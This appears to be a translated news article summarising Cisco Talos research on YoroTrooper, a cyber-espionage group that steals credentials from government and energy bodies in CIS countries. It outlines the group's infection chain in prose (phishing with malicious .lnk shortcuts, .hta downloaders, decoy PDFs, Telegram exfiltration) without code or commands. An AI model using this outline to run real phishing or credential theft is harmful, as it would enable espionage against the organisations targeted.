YoroTrooper hackers attack the CIS: criminals are interested in credentials and other confidential information
Dozens of organizations in Belarus, Azerbaijan, Tajikistan, Turkmenistan and Kyrgyzstan were hit.
A previously unregistered hacker group called YoroTrooper has targeted government, energy and other critical organizations across Europe as part of a cyber-espionage campaign that has been ongoing since at least June 2022.
“Information stolen in successful compromises includes credentials from multiple applications, browser history, cookies, system information, and screenshots,” declared Cisco Talos researchers.
Known target countries include Belarus, Azerbaijan, Tajikistan, Kyrgyzstan, Turkmenistan and other CIS countries. Also, according to the researchers, went to Turkish government agencies.
Experts believe that a Russian-speaking attacker was involved in the attacks due to victimology patterns and the presence of Cyrillic fragments in some implants. However, the YoroTrooper invasion kit has also been found to show a tactical match with the PoetRAT team, which was documented in 2020 using coronavirus-themed decoys to target government and energy sectors in Azerbaijan. Cisco Talos researchers failed to identify the country of origin of PoetRAT during the last investigation.
YoroTrooper’s data collection goals are achieved by combining common malware (Ave Maria, LodaRAT, Meterpreter and Stink) with infection chains using malicious shortcuts (.lnk) and decoy documents wrapped in “.zip” / “.rar” archives and distributed through spear phishing.
YoroTrooper infection chain
Malicious shortcuts act as simple downloaders to execute an “.hta” file received from a remote server. After launching this file, the attack victim sees a regular “.pdf” document, but a dropper is launched in the background to deliver the data thief. Attackers use Telegram as a channel for exfiltrating data.
The use of LodaRAT by the attackers is noteworthy, as it indicates that this malware is used by several different groups, despite the malware belonging to the Kasablanka hackers. This group has also previously been seen distributing Ave Maria in recent malware campaigns targeting Russia.
Other auxiliary tools deployed by YoroTrooper consist of reverse shells and a custom keylogger based on the C language. The keylogger is capable of recording keystrokes and saving them to a file on disk.
“It is worth noting that while this campaign began with the distribution of common malware such as Ave Maria and LodaRAT, it has expanded significantly to include Python-based malware. This highlights the increased efforts being made by attackers,” the Cisco Talos researchers concluded.